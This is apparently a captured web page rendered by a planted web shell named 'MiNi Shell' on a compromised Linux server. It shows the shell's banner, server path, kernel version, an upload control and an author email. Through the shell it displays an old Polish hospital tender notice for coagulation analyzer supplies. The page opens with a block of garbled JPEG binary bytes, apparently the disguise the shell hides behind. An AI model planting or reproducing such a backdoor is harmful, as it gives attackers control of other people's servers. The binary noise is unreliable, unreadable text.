JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090723/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090723/251320-N-2009.html

<p class="kh_header"><b>Opoczno: Przedmiotem zamówienia jest dostawa odczynników, kalibratorów, materiałów kontrolnych i  materiałów zużywalnych wraz z dzierżawą analizatora koagulologicznego dla potrzeb SP ZOZ Szpitala Powiatowego im. Edmunda Biernackiego w Opocznie.</b><br>
<b>Numer ogłoszenia: 251320 - 2009; data zamieszczenia: 23.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> SP ZOZ Szpital Rejonowy w Opocznie , ul. Partyzantów 30, 26-300 Opoczno, woj. łódzkie, tel. 044 7544823.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.opoczno.net</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest dostawa odczynników, kalibratorów, materiałów kontrolnych i  materiałów zużywalnych wraz z dzierżawą analizatora koagulologicznego dla potrzeb SP ZOZ Szpitala Powiatowego im. Edmunda Biernackiego w Opocznie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa odczynników, kalibratorów, materiałów kontrolnych i materiałów zużywalnych wraz z dzierżawą analizatora koagulologicznego dla potrzeb SP ZOZ Szpitala Powiatowego im. Edmunda Biernackiego w Opocznie. (Zał. 3) 

Odczynniki warunki wymagane :
- Tromboplastyna ludzka ( nierekombinowana ) o ISI zbliżonym do 1,0 (?0,1 )
- Możliwość kalibracji PT bezpośrednio w INR
- Oznaczenie czasu APTT - odczynnik ciekły, gotowy do użycia 
- Oznaczanie fibrynogenu metodą niewymagającą wstępnego rozcieńczania próbki
- Standardy fibrynogenu - osobne: minimum 5 różnych poziomów w zakresie pomiarowym od 80 do 900 mg/dl
- Materiały standardowe (kalibratory) , osocza kontrolne: mianowane, pochodzenia ludzkiego, liofilizowane z możliwością zamrażania ( stabilność po zamrożeniu minimum 2 tygodnie)
- Kalibracja nie częściej niż raz na serię danego odczynnika.

Aparat - warunki graniczne: 
- Zautomatyzowany analizator koagulologiczny
- Analizator typu RANDOM ACCES z możliwością pracy w trybie CITO
- Możliwość oznaczeń zarówno metodami wykrzepialnymi (odczyt na zasadzie nefelometrii) jak i chromogenną oraz immunologiczną
- Panel oznaczeń: PT, APTT, fibrynogen metodą Claussa, TT, AT III, D-Dimery
- Wydajność analizatora co najmniej 40-50 oznaczeń/godzinę
- Monitorowanie zużycia odczynników
- Możliwość oznaczania fibrynogenu zarówno na podstawie pomiaru czasu protrombinowego jak i metodą Claussa
- Możliwość wstawiania próbek od pacjentów zarówno w probówkach macierzystych bezpośrednio po odwirowaniu, bez konieczności odciągania osocza jak i w osobnych naczyńkach 
- Czujniki poziomów odczynników i próbki
- Chłodzenie odczynników na pokładzie analizatora
- Automatyczne rozcieńczanie próbek i kalibratorów
- Możliwość automatycznego powtarzania pomiarów w przypadku otrzymania wyników budzących wątpliwości lub wyników poza liniowością
- Pamięć krzywych kalibracyjnych 
- Możliwość wydruków krzywych kalibracji 
- Oprogramowanie analizatora wyposażone w system kontroli jakości wykonywanych badań wraz z wykresami Levey-Jenningsa
- Oprogramowanie analizatora wyposażone w bazę danych wyników pacjentów i danych kalibracyjnych
- Możliwość przechowywania wyników badań, kontroli i kalibracji w bazie danych
- Dwukierunkowa komunikacja z istniejącą siecią komputerową w laboratorium
- Analizator wyposażony w wewnętrzny czytnik kodów kreskowych
- Analizator wyposażony w UPS dla dokończenia rozpoczętych analiz na około 20 minut
- Bezpłatny serwis i okresowe przeglądy konserwacyjne oraz części zamienne w czasie trwania umowy
- Wykonawca dostarczy wraz z analizatorem instrukcję obsługi w języku polskim oraz kartę gwarancyjną 
- Wykonawca dokona montażu ww. sprzętu oraz zapewni bezpłatne przeszkolenie personelu laboratorium w obsłudze analizatora w czasie i miejscu wskazanym przez Zamawiającego w ciągu miesiąca od podpisania umowy
- Koszt podłączenia analizatora do istniejącego w laboratorium systemu komputerowego ponosi Wykonawca 
- Wykonawca jest zobowiązany na czas trwania umowy dostarczyć zestaw komputerowy.
          OPIS PRZEDMIOTU ZAMÓWIENIA WINIEN BYĆ DOŁĄCZONY DO OFERTY.

   Dostawca jest zobowiązany na czas trwania umowy dostarczyć zestaw komputerowy i we własnym zakresie dokonać podłączenia analizatora do sieci komputerowej laboratorium wraz z przeszkoleniem pracowników. 
Zamawiający nie dopuszcza możliwość składania ofert częściowych i nie dopuszcza   możliwości składania ofert wariantowych.
Postępowanie prowadzone jest w trybie przetargu nieograniczonego o wartości szacunkowej mniejszej niż kwoty określone w przepisach wydanych na podstawie art. 11 ust. 8.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0, 33.10.00.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.O zamówienie mogą ubiegać się wykonawcy, którzy spełniają następujące warunki
   Celem udokumentowania spełnienia wymagań art.22 ust. 1 oraz art. 24 pkt. 2 i 3 ustawy  z dnia 29 stycznia 2004r. Prawo zamówień publicznych oferent dołącza do ofert następujące dokumenty :
2.Oświadczenie wg załącznika nr 2 o:
a)posiadaniu uprawnienia do wykonywania działalności lub czynności określonej przedmiotem zamówienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień 
b)posiadania niezbędnej wiedzę i doświadczenie oraz dysponowaniu potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia
c)znajdowaniu  się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
d)nie podleganiu wykluczeniu z postępowania o udzielenie zamówienia na podstawie art.24 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych tj Dz. U. z 2008 Nr 171, poz. 1058
e) wyrażeniu zgody na wszystkie warunki i wymogi określone w SIWZ

W celu potwierdzenia, że wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy  Prawo zamówień publicznych zamawiający żąda następujących dokumentów:
1.Aktualny odpis z właściwego rejestru albo zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej wystawiony nie wcześniej                     niż 6  miesięcy przed upływem terminu składania ofert
2.Aktualnych zaświadczeń właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne oraz społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie  wcześniej niż 3 miesiące przed upływem terminu składania ofert.
3.Zaświadczenie o wpisie do Rejestru Wytwórców i Wyrobów Medycznych lub dokument potwierdzający ubieganie się o wpis do w/w rejestru.
4.Znak jakości CE, odnoszący się do aparatu i odczynników.
5.Karty charakterystyki produktu i substancji niebezpiecznych na CD.

Do ofert należy również dołączyć 
1.Wypełniony formularz ofertowy (Zał. nr 1)
2.Formularz asortymentowo-cenowy ( Zał nr 3 )
3.Parafowany wzór umowy.
4.W przypadku, gdy Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej składa dokumenty wymienione w §2 Rozporządzenia Prezesa Rady Ministrów  z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy oraz form, w jakich te dokumenty mogą być składane.
5.Dokumenty  o których jest mowa powyżej mogą być przedstawione w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez wykonawcę.
6.Złożenie oferty jest równoznaczne z akceptacją warunków zawartych w SIWZ.
7.Brak jakichkolwiek z wyżej wymienionych oświadczeń i dokumentów lub złożenie dokumentów w niewłaściwej formie i niewłaściwym czasie spowoduje odrzucenie oferty..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Oświadczenie wg załącznika nr 2 o:
a)posiadaniu uprawnienia do wykonywania działalności lub czynności określonej przedmiotem zamówienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień 
b)posiadania niezbędnej wiedzę i doświadczenie oraz dysponowaniu potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia
c)znajdowaniu  się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
d)nie podleganiu wykluczeniu z postępowania o udzielenie zamówienia na podstawie art.24 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych tj Dz. U. z 2008 Nr 171, poz. 1058
e) wyrażeniu zgody na wszystkie warunki i wymogi określone w SIWZ

W celu potwierdzenia, że wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy  Prawo zamówień publicznych zamawiający żąda następujących dokumentów:
2.Aktualny odpis z właściwego rejestru albo zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej wystawiony nie wcześniej             niż 6  miesięcy przed upływem terminu składania ofert
3.Aktualnych zaświadczeń właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne oraz społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie  wcześniej niż 3 miesiące przed upływem terminu składania ofert.
4.Zaświadczenie o wpisie do Rejestru Wytwórców i Wyrobów Medycznych lub dokument potwierdzający ubieganie się o wpis do w/w rejestru.
5.Znak jakości CE, odnoszący się do aparatu i odczynników.
6.Karty charakterystyki produktu i substancji niebezpiecznych na CD.

Do ofert należy również dołączyć 
7.Wypełniony formularz ofertowy (Zał. nr 1)
8.Formularz asortymentowo-cenowy ( Zał nr 3 )
9.Parafowany wzór umowy..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.szpital.opoczno.net.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SP ZOZ Szpital Powiatowy im. Edmunda Biernackiego w Opocznie, 26-300 Opoczno,
 ul. Partyzantów  30, Sekretariat,.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.07.2009 godzina 12:00, miejsce: SP ZOZ Szpital Powiatowy im. Edmunda Biernackiego w Opocznie, 26-300 Opoczno,
 ul. Partyzantów  30, Sekretariat, nie później niż do dnia 31.07.2009r., do godz. 12.00.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com